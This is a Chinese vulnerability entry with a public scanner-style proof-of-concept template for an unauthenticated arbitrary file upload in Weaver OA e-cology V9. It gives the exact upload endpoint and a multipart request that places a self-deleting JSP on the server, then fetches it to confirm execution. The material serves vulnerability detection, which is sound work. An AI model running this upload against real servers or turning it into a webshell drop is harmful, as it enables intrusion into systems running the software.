漏洞描述
泛微OA ecology V9前台任意上传漏洞 app="Weaver-OA"
ecology-arbitrary-file-upload: 泛微OA e-cology V9前台任意上传漏洞
PoC代码[已公开]
id: ecology-arbitrary-file-upload
info:
name: 泛微OA e-cology V9前台任意上传漏洞
author: jingling(https://github.com/shmilylty)
severity: critical
description: 泛微OA ecology V9前台任意上传漏洞 app="Weaver-OA"
reference:
- https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
tags: ecology,upload
set:
r1: randomLowercase(4)
r2: randomInt(40000, 44800)
r3: randomInt(40000, 44800)
rboundary: randomLowercase(8)
rules:
r0:
request:
method: POST
path: /page/exportImport/uploadOperation.jsp
headers:
Content-Type: multipart/form-data; boundary=WebKitFormBoundary{{rboundary}}
body: "\
--WebKitFormBoundary{{rboundary}}\r\n\
Content-Disposition: form-data; name=\"file\"; filename=\"{{r1}}.jsp\"\r\n\
Content-Type: application/octet-stream\r\n\
\r\n\
<%out.print({{r2}} * {{r3}});new java.io.File(application.getRealPath(request.getServletPath())).delete();%>\r\n\
--WebKitFormBoundary{{rboundary}}--\r\n\
"
expression: response.status == 200
r1:
request:
method: GET
path: /page/exportImport/fileTransfer/{{r1}}.jsp
expression: response.status == 200 && response.body.bcontains(bytes(string(r2 * r3)))
expression: r0() && r1()